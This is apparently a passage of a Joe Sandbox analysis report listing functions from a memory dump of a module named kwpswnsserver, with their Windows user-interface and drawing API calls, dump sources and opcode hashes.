                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$PointsWindow$MessageParentScreenSend
                                                                  • String ID:
                                                                  • API String ID: 2689702638-0
                                                                  • Opcode ID: 80ba4cce72d2f353a47d70d8c5e7d7d15053a7d64f9bb1b9e9a493d6023476c2
                                                                  • Instruction ID: 939aa8ee82af229eea0f3429f2a82adabff698a729cdb91bded783590796fa9a
                                                                  • Opcode Fuzzy Hash: 80ba4cce72d2f353a47d70d8c5e7d7d15053a7d64f9bb1b9e9a493d6023476c2
                                                                  • Instruction Fuzzy Hash: 1A31D73160070AEFCF26EF29CD148AE7BB5FF44354B118A2AF45A97610EB31A911DF50
                                                                  Function 6C9D0857 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ad46740a3c4e2e55e27d0eeab42283606646b0a20943ab5d6b0d54439d36a8cc
                                                                  • Instruction ID: fc9d2c381cc999cce703e0036cd64c90c573a3c43cdca925813823ce09446157
                                                                  • Opcode Fuzzy Hash: ad46740a3c4e2e55e27d0eeab42283606646b0a20943ab5d6b0d54439d36a8cc
                                                                  • Instruction Fuzzy Hash: 5B113A31300759ABFB202BA5CC08B8B3B7CFB42768F13C250E515E7690EB71ED0192A2
                                                                  Function 6C8BC861 Relevance: 6.1, APIs: 4, Instructions: 70timewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KillTimer.USER32(?,0000EC17), ref: 6C8BC875
                                                                  • KillTimer.USER32(?,0000EC18), ref: 6C8BC883
                                                                  • IsWindow.USER32(?), ref: 6C8BC8F3
                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 6C8BC91A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: KillTimer$MessagePostWindow
                                                                  • String ID:
                                                                  • API String ID: 3970157719-0
                                                                  • Opcode ID: da763db16c00d5080f18dc52162802d851d462f179b555a2487d4cf2feb7d41a
                                                                  • Instruction ID: 7ee57af6f3619f758957d7fb0af5e753b454ecd9656856779eff231bd9de609d
                                                                  • Opcode Fuzzy Hash: da763db16c00d5080f18dc52162802d851d462f179b555a2487d4cf2feb7d41a
                                                                  • Instruction Fuzzy Hash: 9021CF31700316AFEB18AF64CD54B9DB7B5FB45305F204169D946AB791DB70A801CB90
                                                                  Function 6C8BCC53 Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClientRect.USER32 ref: 6C8BCC85
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BCC9E
                                                                    • Part of subcall function 6C8BA812: ScreenToClient.USER32(?,?), ref: 6C8BA82E
                                                                    • Part of subcall function 6C8BA812: GetParent.USER32(?), ref: 6C8BA83E
                                                                    • Part of subcall function 6C8BA812: GetClientRect.USER32(?,?), ref: 6C8BA8D1
                                                                    • Part of subcall function 6C8BA812: MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BA8E3
                                                                    • Part of subcall function 6C8BA812: PtInRect.USER32(?,?,?), ref: 6C8BA8F3
                                                                  • MapWindowPoints.USER32(?,?,?,00000001), ref: 6C8BCCD4
                                                                  • SendMessageW.USER32(?,00000201,?,?), ref: 6C8BCCF3
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$PointsWindow$MessageParentScreenSend
                                                                  • String ID:
                                                                  • API String ID: 2689702638-0
                                                                  • Opcode ID: 751897f4fe4b14e055151a157c5522e1c1a17490b7f792a29e8e01d8849d55da
                                                                  • Instruction ID: 6b4bfcb904b7546e9f8d2a9929d7ec6676f46bace7aebca7023afebfa97c84b6
                                                                  • Opcode Fuzzy Hash: 751897f4fe4b14e055151a157c5522e1c1a17490b7f792a29e8e01d8849d55da
                                                                  • Instruction Fuzzy Hash: 90218331A0030AEFDF159F65CD14AEE7BB6FF48304F108519F81AA2650E771A955DF90
                                                                  Function 6C88EE82 Relevance: 6.1, APIs: 4, Instructions: 62windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C88EEBC
                                                                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C88EEE6
                                                                  • GetCapture.USER32 ref: 6C88EEFC
                                                                  • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6C88EF0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Capture
                                                                  • String ID:
                                                                  • API String ID: 1665607226-0
                                                                  • Opcode ID: 9f010f6033c08d61d42281cbca1254916836fc63e8171405ddf62e5e1c4f0525
                                                                  • Instruction ID: 234da8e2cc7d8b9df2ef7fbc26e6cd90156d048acf50763e94d3c4e64a72ff55
                                                                  • Opcode Fuzzy Hash: 9f010f6033c08d61d42281cbca1254916836fc63e8171405ddf62e5e1c4f0525
                                                                  • Instruction Fuzzy Hash: B911A57530161E7FEE352B249C89FBA7A6EFB48789F040524F60597AD1DB505C0196A0
                                                                  Function 6C8921B6 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(00000000), ref: 6C892203
                                                                  • GetWindowRect.USER32(?,?), ref: 6C89221F
                                                                  • PtInRect.USER32(?,00000000,00000000), ref: 6C89222F
                                                                  • CallNextHookEx.USER32(?,?,?), ref: 6C892257
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$CallCursorHookNextWindow
                                                                  • String ID:
                                                                  • API String ID: 3719484595-0
                                                                  • Opcode ID: e95cfd9da58618015a78e08ee3577ae90aa9f0fae435a1c1dbe9898273d0983c
                                                                  • Instruction ID: d335883ae410df085c62725b7cc28f459a193d3c1e1c725c86c17df215870614
                                                                  • Opcode Fuzzy Hash: e95cfd9da58618015a78e08ee3577ae90aa9f0fae435a1c1dbe9898273d0983c
                                                                  • Instruction Fuzzy Hash: D3218136A0121BABCF14DFA8CE58BEE7BB4FF09309F10C518A110E2550C734A6529B91
                                                                  Function 6C8D01D3 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8D01DA
                                                                  • IsRectEmpty.USER32(?), ref: 6C8D01FC
                                                                    • Part of subcall function 6C935F59: __EH_prolog3_GS.LIBCMT ref: 6C935F60
                                                                    • Part of subcall function 6C935F59: CreateCompatibleDC.GDI32(00000000), ref: 6C935FC4
                                                                    • Part of subcall function 6C935F59: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C935FFA
                                                                    • Part of subcall function 6C935F59: SelectObject.GDI32(?,00000000), ref: 6C93604E
                                                                  • IsRectEmpty.USER32(?), ref: 6C8D0240
                                                                  • FillRect.USER32(?,?,-000000A0), ref: 6C8D0261
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$CompatibleCreateEmpty$BitmapFillH_prolog3H_prolog3_ObjectSelect
                                                                  • String ID:
                                                                  • API String ID: 2706196367-0
                                                                  • Opcode ID: acd19552210b7ecac7991f9dbf8e18f69e29b8e374ffb375b10d21d5612cdce1
                                                                  • Instruction ID: af71258e1d2e9a4eb9f4babe505d5b9044c68517445a9e1221b7f91e8c2df490
                                                                  • Opcode Fuzzy Hash: acd19552210b7ecac7991f9dbf8e18f69e29b8e374ffb375b10d21d5612cdce1
                                                                  • Instruction Fuzzy Hash: C4118171501149AFCF54DFA4CE44EDE3378BF14319F154A29A415E3A90DB34E518CB61
                                                                  Function 6C88EADE Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetObjectW.GDI32(?,0000000C,?), ref: 6C88EB29
                                                                  • SetBkColor.GDI32(?,?), ref: 6C88EB33
                                                                  • GetSysColor.USER32(00000008), ref: 6C88EB43
                                                                  • SetTextColor.GDI32(?,?), ref: 6C88EB4B
                                                                    • Part of subcall function 6C8A0147: GetWindowLongW.USER32(?,000000F0), ref: 6C8A0162
                                                                    • Part of subcall function 6C8A0147: GetClassNameW.USER32(?,?,0000000A), ref: 6C8A0177
                                                                    • Part of subcall function 6C8A0147: CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,?,?,?,?,?,?,?,?,6C8879A6), ref: 6C8A018E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ClassCompareLongNameObjectStringTextWindow
                                                                  • String ID:
                                                                  • API String ID: 3274569906-0
                                                                  • Opcode ID: 83bc10775d363225002dc0c8ad7ee388dd8c4d1d1725a5b13c3abe7f0c4c4d51
                                                                  • Instruction ID: d28085918720a39d960df3b94ce6857e59d763b8e1cf010c3fa6f8e710affa93
                                                                  • Opcode Fuzzy Hash: 83bc10775d363225002dc0c8ad7ee388dd8c4d1d1725a5b13c3abe7f0c4c4d51
                                                                  • Instruction Fuzzy Hash: 2F016535602219BBDB349E688E409AE77B9EF06A18F604915F936E39C4D730D9018794
                                                                  Function 6C89A71B Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,00000000), ref: 6C89A756
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 6C89A75F
                                                                  • swprintf.LIBCMT ref: 6C89A77C
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C89A78D
                                                                    • Part of subcall function 6C89AC99: RegCloseKey.ADVAPI32(00000000,?,?,?,?,6C89A6C8,?,00000000), ref: 6C89ACDE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Close$PrivateProfileStringValueWriteswprintf
                                                                  • String ID:
                                                                  • API String ID: 581541481-0
                                                                  • Opcode ID: 22328965944d0caea76a8b674d2d42f99a162dc2e9d808c12921235a40a73a1a
                                                                  • Instruction ID: 9f0979fc06f6b13bab1adf243b9aab650767bc653ed9c4df8bdc0f8ef63d5aa9
                                                                  • Opcode Fuzzy Hash: 22328965944d0caea76a8b674d2d42f99a162dc2e9d808c12921235a40a73a1a
                                                                  • Instruction Fuzzy Hash: 9001C072A00309BBDB21DE68CD85FEE73BCAF49608F11482AF605E7680DB74ED058760
                                                                  Function 6C8C61A4 Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  • GetForegroundWindow.USER32 ref: 6C8C61CD
                                                                  • GetLastActivePopup.USER32(?), ref: 6C8C61E2
                                                                  • SendMessageW.USER32(?,0000036D,00000040,00000000), ref: 6C8C61FE
                                                                  • SendMessageW.USER32(?,0000036D,00000004,00000000), ref: 6C8C621A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$ActiveForegroundLastLongPopup
                                                                  • String ID:
                                                                  • API String ID: 2039223353-0
                                                                  • Opcode ID: e821f92a74368c0a3a85b5845f107702d063d89f70a150988f295445e7969b6f
                                                                  • Instruction ID: fe0b9af5263909e24799dece4a43f209444d28e68554a40be09a0b8d30ec222b
                                                                  • Opcode Fuzzy Hash: e821f92a74368c0a3a85b5845f107702d063d89f70a150988f295445e7969b6f
                                                                  • Instruction Fuzzy Hash: 550142323017116BEA313B79AE14FFA2A29BB45B5CF214D38FA25D6DC0DBA2C8014201
                                                                  Function 6C886E77 Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgCtrlID.USER32(?), ref: 6C886E87
                                                                  • GetScrollPos.USER32(?,00000002), ref: 6C886E9A
                                                                  • SendMessageW.USER32(?,00000114,?,?), ref: 6C886ED4
                                                                  • SetScrollPos.USER32(?,00000002,?,00000000), ref: 6C886EF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Scroll$CtrlMessageSend
                                                                  • String ID:
                                                                  • API String ID: 1219558039-0
                                                                  • Opcode ID: 00160c218d0c8903930a790a39f6cb860b76cc5ddd999a3aa271818b4c905f39
                                                                  • Instruction ID: bcde98115a285f63b291d28ec6f6e2924dc3120c2c176fc315d684b3b5b8a2f5
                                                                  • Opcode Fuzzy Hash: 00160c218d0c8903930a790a39f6cb860b76cc5ddd999a3aa271818b4c905f39
                                                                  • Instruction Fuzzy Hash: DB11AC72600228EFEB219F68CC49EAE7B75FF89384F014969F945AB150D670AC119B60
                                                                  Function 6C886F08 Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgCtrlID.USER32(?), ref: 6C886F18
                                                                  • GetScrollPos.USER32(?,00000002), ref: 6C886F2B
                                                                  • SendMessageW.USER32(?,00000115,?,?), ref: 6C886F65
                                                                  • SetScrollPos.USER32(?,00000002,?,00000000), ref: 6C886F83
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Scroll$CtrlMessageSend
                                                                  • String ID:
                                                                  • API String ID: 1219558039-0
                                                                  • Opcode ID: 49574bb3c3052f78dbd76eb04982027c043693366205c57d935e1bbb1500401c
                                                                  • Instruction ID: 5f670d9f8b39b9a6ffa8a45c348438af2eb9f45e5e677451263f82e84f666877
                                                                  • Opcode Fuzzy Hash: 49574bb3c3052f78dbd76eb04982027c043693366205c57d935e1bbb1500401c
                                                                  • Instruction Fuzzy Hash: 3011AC32610224EFDB219F68CC49EAA7B76FF89344F0049A9F905AB151E770AC11DB60
                                                                  Function 6C8C679D Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: OffsetRect
                                                                  • String ID:
                                                                  • API String ID: 177026234-0
                                                                  • Opcode ID: e63c8c75e53e9dd14a2dc06755d5259dda3f53c9ea3124fea549a3400fa9b8b8
                                                                  • Instruction ID: 47bcf8c49bdcd21252f567ebda7d0fe73741988d4b8b0fb350e4e6a200d6ffe5
                                                                  • Opcode Fuzzy Hash: e63c8c75e53e9dd14a2dc06755d5259dda3f53c9ea3124fea549a3400fa9b8b8
                                                                  • Instruction Fuzzy Hash: E5014472601214AFCF149FADCC88D967BBCFF85255B048569FD09CB205DA30E845CBA0
                                                                  Function 6C8CA957 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8CA95E
                                                                  • FillRect.USER32(?,?,-000000D0), ref: 6C8CA983
                                                                  • CreateSolidBrush.GDI32(000000FF), ref: 6C8CA99E
                                                                  • FillRect.USER32(00000000,00000000,00000000), ref: 6C8CA9B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: FillRect$BrushCreateH_prolog3Solid
                                                                  • String ID:
                                                                  • API String ID: 1242064992-0
                                                                  • Opcode ID: 83de3d193d0b9cde0a38f0920e676f2b037b4cb49eda10c9d420d92afd930792
                                                                  • Instruction ID: 4bc50cebb38ccf38af5504e10bb2b90c20ee59a2ecd6fe56ae99bf913aa6c721
                                                                  • Opcode Fuzzy Hash: 83de3d193d0b9cde0a38f0920e676f2b037b4cb49eda10c9d420d92afd930792
                                                                  • Instruction Fuzzy Hash: 9411BFB150124A9FCB20DF98CE05AEE7B74BF04319F014615F421A7A90D770E919CBA1
                                                                  Function 6C8B4350 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 6C8B438F
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8B43A3
                                                                  • UpdateWindow.USER32(?), ref: 6C8B43AC
                                                                  • SetRectEmpty.USER32(?), ref: 6C8B43B3
                                                                  Memory Dump Source
